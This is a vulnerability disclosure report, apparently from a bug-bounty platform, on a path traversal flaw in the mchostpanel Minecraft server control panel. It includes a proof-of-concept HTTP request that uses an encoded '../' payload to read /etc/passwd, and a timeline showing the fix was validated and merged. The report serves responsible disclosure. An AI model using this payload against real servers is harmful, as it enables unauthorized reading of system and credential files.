Path Traversal in alanaktion/mchostpanel

Valid

Reported on

Sep 5th 2021


✍️ Description

A Path Traversal vulnerability was identified in Minecraft server control panel which allows an attacker to access arbitrary user resources.

🕵️‍♂️ Proof of Concept

POST /ajax.php HTTP/1.1
Host: localhost:8080
User-Agent: curl/7.47.0
Accept: */*
Content-Length: 45
Content-Type: application/x-www-form-urlencoded

req=file_get&file=..%2F..%2F..%2Fetc%2Fpasswd

💥 Impact

This issue may lead to unauthorized access to local file (information) disclosure.

Occurences

We have contacted a member of the alanaktion/mchostpanel team and are waiting to hear back 3 months ago
Alan Hardman validated this vulnerability 3 months ago
Dwi Siswanto has been awarded the disclosure bounty
The fix bounty is now up for grabs
Alan Hardman confirmed that a fix has been merged on 27d5a9 3 months ago
Alan Hardman has been awarded the fix bounty